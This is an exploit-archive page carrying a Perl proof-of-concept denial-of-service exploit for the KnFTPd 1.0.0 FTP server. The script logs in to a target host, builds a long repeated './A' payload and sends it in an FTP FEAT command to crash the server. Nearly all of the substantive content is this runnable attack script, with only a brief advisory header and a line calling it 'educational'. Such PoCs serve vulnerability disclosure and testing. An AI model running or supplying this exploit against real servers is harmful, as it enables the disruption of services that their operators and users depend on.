KnFTPd 1.0.0 Denial Of Service

KnFTPd 1.0.0 Denial Of Service: Posted Mar 29, 2012; Authored by Stefan Schurtz; KnFTPd version 1.0.0 FEAT denial of service proof of concept exploit.; tags | exploit, denial of service, proof of concept; SHA-256 | 23362117b24d612d1493f972844422aad68f031cda99ca830f75c6ecd391d069; Download | Favorite | View

KnFTPd 1.0.0 Denial Of Service

#!/usr/bin/perl
#################################################################################
# Advisory: KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
# Author: Stefan Schurtz
# Affected Software: Successfully tested on KnFTPd 1.0.0
# Vendor URL: https://knftp.sourceforge.net/
# Vendor Status: informed
# CVE-ID: -
# PoC-Version: 1.0
#################################################################################
use strict;
use Net::FTP;
 
my $user = "system";
my $password = "secret";
 
########################
# connect
########################
my $target = $ARGV[0];
my $plength = $ARGV[1];
 
print "\n";
print "\t#######################################################\n";
print "\t# This PoC-Exploit is only for educational purpose!!! #\n";
print "\t#######################################################\n";
print "\n";
 
if (!$ARGV[0]||!$ARGV[1]) {
    print "[+] Usage: $@ <target> <payload length>\n";
    exit 1;
}
 
my $ftp=Net::FTP->new($target,Timeout=>12) or die "Cannot connect to $target: $@";
print "[+] Connected to $target\n";
 
########################
# login
########################
$ftp->login($user,$password) or die "Cannot login ", $ftp->message;
print "[+] Logged in with user $user\n";
 
###################################################
# Building payload './A' with min. length of 94
##################################################
my @p = ( "","./A" );
my $payload;
 
print "[+] Building payload\n";
 
for (my $i=1;$i<=$plength;$i++) {
     $payload .= $p[$i];
     push(@p,$p[$i]);
}
sleep(3);
 
#########################################
# Sending payload
#########################################
print "[+] Sending payload [$payload]\n";
$ftp->quot('FEAT ' ."$payload");
 
##########################################
# disconnect
##########################################
print "[+] Done\n";
$ftp->quit;
exit 0;
#EOF

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 55 files
LiquidWorm 20 files
Debian 18 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

KnFTPd 1.0.0 Denial Of Service

KnFTPd 1.0.0 Denial Of Service

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

KnFTPd 1.0.0 Denial Of Service

Share This

KnFTPd 1.0.0 Denial Of Service

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems